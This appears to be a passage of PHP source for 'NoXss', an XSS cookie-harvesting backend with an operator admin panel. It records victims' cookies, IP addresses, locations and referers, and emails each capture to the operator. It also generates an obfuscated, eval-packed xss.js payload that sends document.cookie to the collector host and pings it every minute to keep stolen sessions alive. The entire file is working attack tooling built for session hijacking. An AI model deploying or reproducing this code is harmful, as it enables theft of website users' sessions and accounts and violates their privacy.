Date : '.$xss_date.'
IP : '.$xss_ip.'
Location : '.$xss_location.'
Referer : '.$xss_referer.'
Cookie : '.$xss_cookie.'
Hash : '.md5($xss_ip).'
NoXss : '.$shell.'
';
AppSendMail('A Xss Info Had Got!' ,$contents);
}
else if (isset($_GET['session']))
{
// KEEP SESSION
$xss_cookie = $_GET['session'];
AppKeepSession($xss_ip);
}
else if ($_GET['act'] == 'js')
{
// RECREATE XSS.JS
if (AppCheck($password)) AppCreateJs();
}
else if ($_GET['act'] == 'view')
{
// VIEW NOC LIST
if (AppCheck($password)) AppReadNox();
}
else if ($_GET['act'] == 'del')
{
// DELETE NOC FILE
if (AppCheck($password)) AppDelNox();
}
else
{
// CHECK LOGIN
if (AppCheck($password)) AppViewXss();
}
// CHECK LOGIN
function AppCheck($_p)
{
$pwd = $_GET['pass'];
if (md5(md5($pwd)) != $_p)
{
echo 'Fuck You!';
}
else
{
return true;
}
}
// SAVE XSS
function AppSaveXss($_h, $_d, $_i, $_l, $_r, $_c)
{
$fp = fopen('./cookie/'.date("Y-m-d-H-i-s").'.noc', 'a');
fwrite($fp, $_h."\r\n");
fwrite($fp, 'Date: '.$_d."\r\n");
fwrite($fp, 'IP: '.$_i."\r\n");
fwrite($fp, 'Location: '.$_l."\r\n");
fwrite($fp, 'Referer: '.$_r."\r\n");
fwrite($fp, 'Cookie: '.$_c);
fclose($fp);
}
// SEND MAIL
function AppSendMail($_t, $_c)
{
global $smtpserver;
global $smtpserverport;
global $smtpusermail;
global $smtpemailto;
global $smtpuser;
global $smtppass;
$smtp = new smtp($smtpserver, $smtpserverport, true, $smtpuser, $smtppass);
$smtp->debug = FALSE;
$smtp->sendmail($smtpemailto, $smtpusermail, $_t, $_c, 'HTML');
}
// VIEW OUTPUT
function AppViewXss()
{
global $smtpusermail;
global $smtpemailto;
// OUTPUT HEADER
print_r('
NoXss
');
print_r('');
// OUTPUT SIMPLE INFO
global $path;
$noc = AppGetNox('cookie');
print_r('
NoXss
-
Date: '.date('Y/m/d H:i:s').'
Host: '.$_SERVER['HTTP_HOST'].' ('.gethostbyname($_SERVER['SERVER_NAME']).')
Count: '.count($noc).'
-
SEND USER: '.$smtpusermail.'
SEND TO: '.$smtpemailto.'
- Use Example:
[Creat Js]
');
// OUTPUT TABLE HEADER
print_r('
-
Name
Date
Ip
Referer
Status
Action
');
// OUTPUT NOC LIST
for ($i=count($noc)-1; $i>=0; $i--)
{
// READ NOC FILE
$nocfile = file('./cookie/'.$noc[$i].'.noc');
$j = 0;
foreach($nocfile as &$line)
{
$nocdata[$j] = $line;
$j++;
}
print_r('
['.$noc[$i].']
'.$nocdata[1].'
'.$nocdata[2].'
'.AppSubStr($nocdata[4], 0, 55).'
'.AppCheckStatus($nocdata[0]).'
[
View |
Delete
]
');
}
// OUTPUT FOOTER
print_r('
- Code By : NoevilSparrow @:[email protected] Version: 1.0
');
}
// KEEP SESSION
function AppKeepSession($_c)
{
$session_hash = md5($_c);
// CLEAN SESSION
if (!is_dir('session/'.date('YmdH')))
{
// CREATE FOLDER AND DELETE OTHERS
mkdir('session/'.date('YmdH'));
$handle = @opendir('./session/');
for ($i=0; $dir = @readdir($handle); $i++)
{
if (@is_dir('./session/'.$dir) && $dir!='.' && $dir!='..')
{
if ($dir != date('YmdH'))
{
AppCleanSession('./session/'.$dir);
}
}
}
closedir($handle);
}
// RECORD SESSION
if (!file_exists('./session/'.date('YmdH').'/'.$session_hash.'.nos'))
{
$fp = fopen('./session/'.date('YmdH').'/'.$session_hash.'.nos', 'a');
fwrite($fp, $session_hash);
fclose($fp);
}
}
// CLEAN SESSION
function AppCleanSession($_d)
{
$dh = opendir($_d);
while ($file = readdir($dh))
{
if($file!='.' && $file!='..')
{
$fullpath = $_d.'/'.$file;
if(!is_dir($fullpath))
{
unlink($fullpath);
}
else
{
AppCleanSession($fullpath);
}
}
}
closedir($dh);
if(rmdir($_d))
{
return true;
}
else
{
return false;
}
}
// CHECK STATUS
function AppCheckStatus($_h)
{
$_h = trim($_h);
if (file_exists('./session/'.date('YmdH').'/'.$_h.'.nos'))
{
return 'Keeping';
}
else
{
return 'Lost';
}
}
// READ NOC LIST
function AppGetNox($_p)
{
if (is_dir($_p))
{
if ($handle = opendir($_p))
{
for ($i=0; ($file = readdir($handle)) !== false; )
{
if($file != "." && $file != ".." && $file != "Thumbs.db")
{
$temp = explode('.',$file);
$_r[$i] = $temp[0];
$i++;
}
}
closedir($handle);
}
}
return $_r;
}
// DOWNLOAD MAIL CLASS
function AppGetClass($_u)
{
$file = fopen ($_u, 'rb');
if ($file)
{
$fp = fopen('mail.php', 'wb');
if ($fp)
while(!feof($file))
{
fwrite($fp, fread($file, 1024*8 ), 1024*8);
}
}
if ($file)
{
fclose($file);
}
if ($fp)
{
fclose($fp);
}
}
// RE CREATE XSS.JS
function AppCreateJs()
{
global $shell;
$fp = fopen('xss.js', 'w');
fwrite($fp, 'var _u = "http://'.$shell.'";');
fwrite($fp, 'eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!\'\'.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return\'\\\\w+\'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}return p}(\'1 6="3="+9(b.3)+"&8="+l.8;1 i="m="+9(b.3);1 0=a 7();1 2=a 7();5();e();4 5(){0.c("j",k+"?"+6,g);0.h(d);p 0}4 f(){2.c("j",k+"?"+i,g);2.h(d)}4 e(){n.q("f()",o)}\',27,27,\'_hc|var|_hs|cookie|function|C|_c|XMLHttpRequest|location|escape|new|document|open|null|K|S|true|send|_s|GET|_u|top|session|window|60000|delete|setInterval\'.split(\'|\'),0,{}))
');
fclose($fp);
print_r('');
}
// STRING SUB
function AppSubStr($_s, $_f, $_l = null)
{
preg_match_all('/./u', $_s, $match);
$strlength = count($match[0]);
if (is_null($_l) || $strlength < $_l)
{
$result = implode('', array_slice($match[0], $_f));
}
else
{
$result = implode('', array_slice($match[0], $_f, $_l)).'...';
}
return $result;
}
// READ NOC FILE
function AppReadNox()
{
$nocfile = file('./cookie/'.$_GET['noc'].'.noc');
foreach($nocfile as &$line)
{
print_r($line.'
');
}
}
// DELETE NOC FILE
function AppDelNox()
{
if (!unlink('./cookie/'.$_GET['noc'].'.noc'))
{
print_r('');
}
else
{
print_r('');
}
}
?>